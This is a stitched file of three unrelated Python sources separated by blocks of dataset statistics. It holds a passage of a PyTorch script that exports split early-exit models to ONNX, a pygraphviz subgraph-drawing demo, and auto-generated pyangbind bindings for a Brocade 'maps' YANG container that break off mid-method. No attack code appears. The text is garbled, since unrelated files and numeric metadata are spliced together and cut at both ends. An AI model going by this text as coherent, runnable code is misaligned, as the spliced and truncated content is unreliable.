'batch_size'}, # },opset_version=11) # exit() print("Begin point: " + str(begin_point)) print("Split point: " + str(split_point)) # print(dummy_input1.shape) # print(dummy_input2.shape) if inst.backbone == "resnet" or inst.backbone == "posenet" or inst.backbone == "Wav2Vec2": s1_input_names = ["input"] s1_output_names = ["output1", "exit_output"] torch.onnx.export(s1_model, dummy_input1, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=s1_input_names, output_names=s1_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output1': {0: 'batch_size'}, 'exit_output': {0: 'batch_size'}, },opset_version=11) s2_input_names = ["input"] s2_output_names = ["final_output"] torch.onnx.export(s2_model, dummy_input2, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=s2_input_names, output_names=s2_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'final_output': {0: 'batch_size'}, },opset_version=11) elif inst.backbone == "openseg": s1_input_names = ["input"] # s1_output_names = ["output_dsn", "output", "x_moveon"] s1_output_names = ["output_dsn", "output"] torch.onnx.export(s1_model, dummy_input1, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=s1_input_names, output_names=s1_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output_dsn': {0: 'batch_size'}, 'output': {0: 'batch_size'}, # 'x_moveon': {0: 'batch_size'}, },opset_version=11) s2_input_names = ["input"] s2_output_names = ["output_dsn", "output"] torch.onnx.export(s2_model, dummy_input2, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=s2_input_names, output_names=s2_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output_dsn': {0: 'batch_size'}, 'output': {0: 'batch_size'}, },opset_version=11) elif inst.backbone == "bert": from transformers.convert_graph_to_onnx import load_graph_from_args, infer_shapes, ensure_valid_input pipeline_name = "feature-extraction" framework = "pt" model_name = "bert-base-uncased" tokenizer = "bert-base-uncased" nlp = load_graph_from_args(pipeline_name, framework, model_name, tokenizer) input_names, output_names, dynamic_axes, tokens = infer_shapes(nlp, "pt") ordered_input_names, s1_model_args = ensure_valid_input(nlp.model, tokens, input_names) dynamic_axes.pop('output_0') dynamic_axes.pop('output_1') if begin_point == 0: s1_output_names = ["output1", "exit_output"] s1_dynamic_axes = copy.deepcopy(dynamic_axes) s1_dynamic_axes['output1'] = {0: 'batch', 1: 'sequence'} s1_dynamic_axes['exit_output'] = {0: 'batch'} torch.onnx.export( s1_model, s1_model_args, f="/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=ordered_input_names, output_names=s1_output_names, dynamic_axes=s1_dynamic_axes, do_constant_folding=True, enable_onnx_checker=True, opset_version=11, ) else: s1_output_names = ["output1", "exit_output"] s1_dynamic_axes = copy.deepcopy(dynamic_axes) s1_dynamic_axes.pop('token_type_ids') s1_dynamic_axes['output1'] = {0: 'batch', 1: 'sequence'} s1_dynamic_axes['exit_output'] = {0: 'batch'} s1_model_args = (torch.Tensor(1, 7, 768), torch.Tensor(1, 7)) torch.onnx.export( s1_model, s1_model_args, f="/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=ordered_input_names[:2], output_names=s1_output_names, dynamic_axes=s1_dynamic_axes, do_constant_folding=True, enable_onnx_checker=True, opset_version=11, ) s2_output_names = ["final_output"] s2_dynamic_axes = copy.deepcopy(dynamic_axes) s2_dynamic_axes.pop('token_type_ids') s2_dynamic_axes['final_output'] = {0: 'batch'} s2_model_args = (torch.Tensor(1, 7, 768), torch.Tensor(1, 7)) torch.onnx.export( s2_model, s2_model_args, f="/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=ordered_input_names[:2], output_names=s2_output_names, dynamic_axes=s2_dynamic_axes, do_constant_folding=True, enable_onnx_checker=True, opset_version=11, ) # elif inst.backbone == "Wav2Vec2": # pass def model_export_func_backup(model_name, split_point_s1, split_point_s2, split_point_s3): inst = construct_net(split_point_s1=split_point_s1, split_point_s2=split_point_s2, split_point_s3=split_point_s3, backbone = model_name) # dummy_input1 = torch.randn(1, 3, 513, 513) if inst.backbone == "resnet" or inst.backbone == "posenet": dummy_input1 = torch.randn(1, 3, 224, 224) elif inst.backbone == "openseg": dummy_input1 = torch.randn(1, 3, 1024, 2048) # dummy_input1 = torch.randn(1, 3, 384, 384) elif inst.backbone == "Wav2Vec2": dummy_input1 = torch.randn(1, 10000) s1_model = inst.construct_net_s1() s1_model.eval() if inst.backbone == "resnet": dummy_input2 = s1_model(dummy_input1) dummy_input2 = dummy_input2[0] elif inst.backbone == "posenet": dummy_input2, x_exit = s1_model(dummy_input1) # dummy_input2 = dummy_input2[0] elif inst.backbone == "Wav2Vec2": dummy_input2 = torch.randn(1, 624, 768) elif inst.backbone == "openseg": # x_dsn, x, x_moveon = s1_model(dummy_input1) dummy_input2 = torch.randn(1, 1024, 129, 257) # dummy_input2 = torch.randn(1, 1024, 48, 48) # print(x_moveon.shape) s2_model = inst.construct_net_s2() s2_model.eval() if inst.backbone == "resnet" or inst.backbone == "posenet": dummy_input3 = s2_model(dummy_input2) elif inst.backbone == "Wav2Vec2": dummy_input3 = torch.randn(1, 624, 768) elif inst.backbone == "openseg": # x_dsn, x, x_moveon = s1_model(dummy_input1) dummy_input3 = torch.randn(1, 1024, 129, 257) # dummy_input2 = torch.randn(1, 1024, 48, 48) # print(x_moveon.shape) s3_model = inst.construct_net_s3() s3_model.eval() print("split_point_s1: " + str(split_point_s1)) print("split_point_s2: " + str(split_point_s2)) print("split_point_s3: " + str(split_point_s3)) # print(dummy_input1.shape) # print(dummy_input2.shape) if inst.backbone == "resnet" or inst.backbone == "posenet" or inst.backbone == "Wav2Vec2": s1_input_names = ["input"] s1_output_names = ["output1", "exit_output"] torch.onnx.export(s1_model, dummy_input1, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=s1_input_names, output_names=s1_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output1': {0: 'batch_size'}, 'exit_output': {0: 'batch_size'}, },opset_version=11) s2_input_names = ["input"] s2_output_names = ["trans_output"] torch.onnx.export(s2_model, dummy_input2, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=s2_input_names, output_names=s2_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'final_output': {0: 'batch_size'}, },opset_version=11) s3_input_names = ["trans_input"] s3_output_names = ["final_output"] torch.onnx.export(s3_model, dummy_input3, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s3.onnx", input_names=s3_input_names, output_names=s3_output_names, verbose=False,dynamic_axes={ 'trans_input': {0: 'batch_size'}, 'final_output': {0: 'batch_size'}, },opset_version=11) elif inst.backbone == "openseg": s1_input_names = ["input"] # s1_output_names = ["output_dsn", "output", "x_moveon"] s1_output_names = ["output_dsn", "output"] torch.onnx.export(s1_model, dummy_input1, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=s1_input_names, output_names=s1_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output_dsn': {0: 'batch_size'}, 'output': {0: 'batch_size'}, # 'x_moveon': {0: 'batch_size'}, },opset_version=11) s2_input_names = ["input"] s2_output_names = ["output_dsn", "output"] torch.onnx.export(s2_model, dummy_input2, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=s2_input_names, output_names=s2_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output_dsn': {0: 'batch_size'}, 'output': {0: 'batch_size'}, },opset_version=11) elif inst.backbone == "bert": from transformers.convert_graph_to_onnx import load_graph_from_args, infer_shapes, ensure_valid_input pipeline_name = "feature-extraction" framework = "pt" model_name = "bert-base-uncased" tokenizer = "bert-base-uncased" nlp = load_graph_from_args(pipeline_name, framework, model_name, tokenizer) input_names, output_names, dynamic_axes, tokens = infer_shapes(nlp, "pt") ordered_input_names, s1_model_args = ensure_valid_input(nlp.model, tokens, input_names) dynamic_axes.pop('output_0') dynamic_axes.pop('output_1') s1_output_names = ["output1", "exit_output"] s1_dynamic_axes = copy.deepcopy(dynamic_axes) s1_dynamic_axes['output1'] = {0: 'batch', 1: 'sequence'} s1_dynamic_axes['exit_output'] = {0: 'batch'} torch.onnx.export( s1_model, s1_model_args, f="/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=ordered_input_names, output_names=s1_output_names, dynamic_axes=s1_dynamic_axes, do_constant_folding=True, enable_onnx_checker=True, opset_version=11, ) s2_output_names = ["final_output"] s2_dynamic_axes = copy.deepcopy(dynamic_axes) s2_dynamic_axes.pop('token_type_ids') s2_dynamic_axes['final_output'] = {0: 'batch'} s2_model_args = (torch.Tensor(1, 7, 768), torch.Tensor(1, 7)) torch.onnx.export( s2_model, s2_model_args, f="/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=ordered_input_names[:2], output_names=s2_output_names, dynamic_axes=s2_dynamic_axes, do_constant_folding=True, enable_onnx_checker=True, opset_version=11, ) # elif inst.backbone == "Wav2Vec2": # pass if __name__ == '__main__': model_export_func('resnet', 0, 2)
47.99591
160
0.558074
2,569
23,470
4.75905
0.070066
0.062163
0.034353
0.031981
0.886553
0.86177
0.838541
0.835106
0.817847
0.803533
0
0.044499
0.339327
23,470
489
161
47.99591
0.74397
0.067661
0
0.783163
0
0
0.123678
0.050185
0
0
0
0
0
1
0.017857
false
0
0.028061
0
0.086735
0.012755
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
9644774128e382e30afab914b50858664b8fffd0
3,716
py
Python
nltk/topology/pygraphviz/graphviz.py
kruskod/nltk
dba7b5431b1d57a75d50e048961c1a203b98c3da
[ "Apache-2.0" ]
1
2015-11-25T00:47:58.000Z
2015-11-25T00:47:58.000Z
nltk/topology/pygraphviz/graphviz.py
kruskod/nltk
dba7b5431b1d57a75d50e048961c1a203b98c3da
[ "Apache-2.0" ]
null
null
null
nltk/topology/pygraphviz/graphviz.py
kruskod/nltk
dba7b5431b1d57a75d50e048961c1a203b98c3da
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # from __future__ import absolute_import # from __future__ import unicode_literals # from __future__ import print_function # from __future__ import division import pygraphviz as pgv def subgraph_example(): # strict (no parallel edges) # digraph # with attribute rankdir set to 'LR' A=pgv.AGraph(directed=False,strict=True,rankdir='TD', shape='none', splines='spline',smoothing=True, outputMode='edgesfirst') # add node 1 with color red A.add_node(0,color='red') #A.add_node(5,color='blue') sg1 = A.add_subgraph(name="cluster1", style='filled', #color='lightgrey', label = 'main' ) sg1.add_node(1,label = "F1") sg1.add_node(2, label = 'F2') sg1.add_node(3) sg2 = A.add_subgraph( name="cluster2", style='filled', #color='lightgrey', label = 'inf' ) sg2.add_node(4) sg2.add_node(5) # sg1.graph_attr['style']='filled' # node [style=filled]; # b0 -> b1 -> b2 -> b3; # label = "process #2"; # color=blue # add some edges # A.add_edge(0,1) A.add_edge(0,2) A.add_edge(0,3) A.add_edge(2,4, color='green') A.add_edge(2,5) A.add_edge(5,0) # sg2.add_edge(5,2) # A.add_edge(1,4,color='green') # A.add_edge(1,3) # A.add_edge(1,3) # sg1.add_edge(3,4) # A.add_edge(3,5) # A.add_edge(3,6) # A.add_edge(4,6) # sg2.add_edge(6,2) # adjust a graph parameter #A.graph_attr['epsilon']='0.001' # A.node_attr['shape']='none' A.node_attr['shape']='box' A.node_attr['style']='rounded' # A.graph_attr['shape']='box' print(A.string()) # print dot file to standard output A.layout('dot') # layout with dot A.draw('foo.ps') # write to file def elleipo_tree(): # strict (no parallel edges) # digraph # with attribute rankdir set to 'LR' A=pgv.AGraph(directed=False,strict=True,rankdir='TD',shape='plaintext', splines='ortho',smoothing=True, outputMode='edgesfirst') # add node 1 with color red A.add_node(0,color='red', label="<Regular<SUB>subscript</SUB>>") #A.add_node(5,color='blue') sg1 = A.add_subgraph(name="cluster1", style='filled', #color='lightgrey', label = 'main' ) sg1.add_node(1,label = "F1") sg1.add_node(2, label = 'F2') sg1.add_node(3) sg2 = A.add_subgraph( name="cluster2", style='filled', #color='lightgrey', label = 'inf' ) sg2.add_node(4) sg2.add_node(5) # sg1.graph_attr['style']='filled' # node [style=filled]; # b0 -> b1 -> b2 -> b3; # label = "process #2"; # color=blue # add some edges # A.add_edge(0,1) A.add_edge(0,2) A.add_edge(0,3) A.add_edge(2,4, color='green') A.add_edge(2,5) A.add_edge(5,0) # sg2.add_edge(5,2) # A.add_edge(1,4,color='green') # A.add_edge(1,3) # A.add_edge(1,3) # sg1.add_edge(3,4) # A.add_edge(3,5) # A.add_edge(3,6) # A.add_edge(4,6) # sg2.add_edge(6,2) # adjust a graph parameter #A.graph_attr['epsilon']='0.001' # A.node_attr['shape']='none' # A.node_attr['shape']='box' # A.node_attr['style']='rounded' # A.graph_attr['shape']='box' print(A.string()) # print dot file to standard output A.layout('dot') # layout with dot A.draw('foo.ps') # write to file if __name__ == "__main__": elleipo_tree() #demo_simplifier() #unify_demo() # demo()
25.805556
132
0.55409
538
3,716
3.656134
0.195167
0.065074
0.097611
0.027453
0.850025
0.850025
0.850025
0.850025
0.850025
0.850025
0
0.046425
0.281216
3,716
144
133
25.805556
0.690004
0.408235
0
0.727273
0
0
0.102022
0.013634
0
0
0
0
0
1
0.036364
false
0
0.018182
0
0.054545
0.036364
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
96462e53e6a1e74fe87ddf79d8465f753e0d50ae
27,392
py
Python
pybind/nos/v7_1_0/rbridge_id/maps/__init__.py
shivharis/pybind
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
[ "Apache-2.0" ]
null
null
null
pybind/nos/v7_1_0/rbridge_id/maps/__init__.py
shivharis/pybind
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
[ "Apache-2.0" ]
null
null
null
pybind/nos/v7_1_0/rbridge_id/maps/__init__.py
shivharis/pybind
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
[ "Apache-2.0" ]
1
2021-11-05T22:15:42.000Z
2021-11-05T22:15:42.000Z
from operator import attrgetter import pyangbind.lib.xpathhelper as xpathhelper from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType from pyangbind.lib.base import PybindBase from decimal import Decimal from bitarray import bitarray import __builtin__ import logicalgroup import rule import policy import enable import email import relay class maps(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module brocade-rbridge - based on the path /rbridge-id/maps. Each member element of the container is represented as a class variable - with a specific YANG type. """ __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__logicalgroup','__rule','__policy','__enable','__email','__relay',) _yang_name = 'maps' _rest_name = 'maps' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): path_helper_ = kwargs.pop("path_helper", None) if path_helper_ is False: self._path_helper = False elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper): self._path_helper = path_helper_ elif hasattr(self, "_parent"): path_helper_ = getattr(self._parent, "_path_helper", False) self._path_helper = path_helper_ else: self._path_helper = False extmethods = kwargs.pop("extmethods", None) if extmethods is False: self._extmethods = False elif extmethods is not None and isinstance(extmethods, dict): self._extmethods = extmethods elif hasattr(self, "_parent"): extmethods = getattr(self._parent, "_extmethods", None) self._extmethods = extmethods else: self._extmethods = False self.__enable = YANGDynClass(base=enable.enable, is_container='container', presence=False, yang_name="enable", rest_name="enable", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure MAPS policy/actions', u'callpoint': u'maps_enable_policy_callpoint', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True) self.__relay = YANGDynClass(base=YANGListType("hostip",relay.relay, yang_name="relay", rest_name="relay", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='hostip', extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}), is_container='list', yang_name="relay", rest_name="relay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) self.__rule = YANGDynClass(base=YANGListType("rulename",rule.rule, yang_name="rule", rest_name="rule", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='rulename', extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}), is_container='list', yang_name="rule", rest_name="rule", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) self.__policy = YANGDynClass(base=YANGListType("policyname",policy.policy, yang_name="policy", rest_name="policy", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='policyname', extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}), is_container='list', yang_name="policy", rest_name="policy", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) self.__logicalgroup = YANGDynClass(base=YANGListType("logicalgroupname",logicalgroup.logicalgroup, yang_name="logicalgroup", rest_name="group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='logicalgroupname', extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}), is_container='list', yang_name="logicalgroup", rest_name="group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) self.__email = YANGDynClass(base=email.email, is_container='container', presence=False, yang_name="email", rest_name="email", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MAPS Email options', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return [u'rbridge-id', u'maps'] def _rest_path(self): if hasattr(self, "_parent"): if self._rest_name: return self._parent._rest_path()+[self._rest_name] else: return self._parent._rest_path() else: return [u'rbridge-id', u'maps'] def _get_logicalgroup(self): """ Getter method for logicalgroup, mapped from YANG variable /rbridge_id/maps/logicalgroup (list) """ return self.__logicalgroup def _set_logicalgroup(self, v, load=False): """ Setter method for logicalgroup, mapped from YANG variable /rbridge_id/maps/logicalgroup (list) If this variable is read-only (config: false) in the source YANG file, then _set_logicalgroup is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_logicalgroup() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGListType("logicalgroupname",logicalgroup.logicalgroup, yang_name="logicalgroup", rest_name="group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='logicalgroupname', extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}), is_container='list', yang_name="logicalgroup", rest_name="group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """logicalgroup must be of a type compatible with list""", 'defined-type': "list", 'generated-type': """YANGDynClass(base=YANGListType("logicalgroupname",logicalgroup.logicalgroup, yang_name="logicalgroup", rest_name="group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='logicalgroupname', extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}), is_container='list', yang_name="logicalgroup", rest_name="group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)""", }) self.__logicalgroup = t if hasattr(self, '_set'): self._set() def _unset_logicalgroup(self): self.__logicalgroup = YANGDynClass(base=YANGListType("logicalgroupname",logicalgroup.logicalgroup, yang_name="logicalgroup", rest_name="group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='logicalgroupname', extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}), is_container='list', yang_name="logicalgroup", rest_name="group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) def _get_rule(self): """ Getter method for rule, mapped from YANG variable /rbridge_id/maps/rule (list) """ return self.__rule def _set_rule(self, v, load=False): """ Setter method for rule, mapped from YANG variable /rbridge_id/maps/rule (list) If this variable is read-only (config: false) in the source YANG file, then _set_rule is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_rule() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGListType("rulename",rule.rule, yang_name="rule", rest_name="rule", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='rulename', extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}), is_container='list', yang_name="rule", rest_name="rule", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """rule must be of a type compatible with list""", 'defined-type': "list", 'generated-type': """YANGDynClass(base=YANGListType("rulename",rule.rule, yang_name="rule", rest_name="rule", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='rulename', extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}), is_container='list', yang_name="rule", rest_name="rule", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)""", }) self.__rule = t if hasattr(self, '_set'): self._set() def _unset_rule(self): self.__rule = YANGDynClass(base=YANGListType("rulename",rule.rule, yang_name="rule", rest_name="rule", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='rulename', extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}), is_container='list', yang_name="rule", rest_name="rule", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) def _get_policy(self): """ Getter method for policy, mapped from YANG variable /rbridge_id/maps/policy (list) """ return self.__policy def _set_policy(self, v, load=False): """ Setter method for policy, mapped from YANG variable /rbridge_id/maps/policy (list) If this variable is read-only (config: false) in the source YANG file, then _set_policy is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_policy() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGListType("policyname",policy.policy, yang_name="policy", rest_name="policy", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='policyname', extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}), is_container='list', yang_name="policy", rest_name="policy", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """policy must be of a type compatible with list""", 'defined-type': "list", 'generated-type': """YANGDynClass(base=YANGListType("policyname",policy.policy, yang_name="policy", rest_name="policy", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='policyname', extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}), is_container='list', yang_name="policy", rest_name="policy", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)""", }) self.__policy = t if hasattr(self, '_set'): self._set() def _unset_policy(self): self.__policy = YANGDynClass(base=YANGListType("policyname",policy.policy, yang_name="policy", rest_name="policy", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='policyname', extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}), is_container='list', yang_name="policy", rest_name="policy", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) def _get_enable(self): """ Getter method for enable, mapped from YANG variable /rbridge_id/maps/enable (container) """ return self.__enable def _set_enable(self, v, 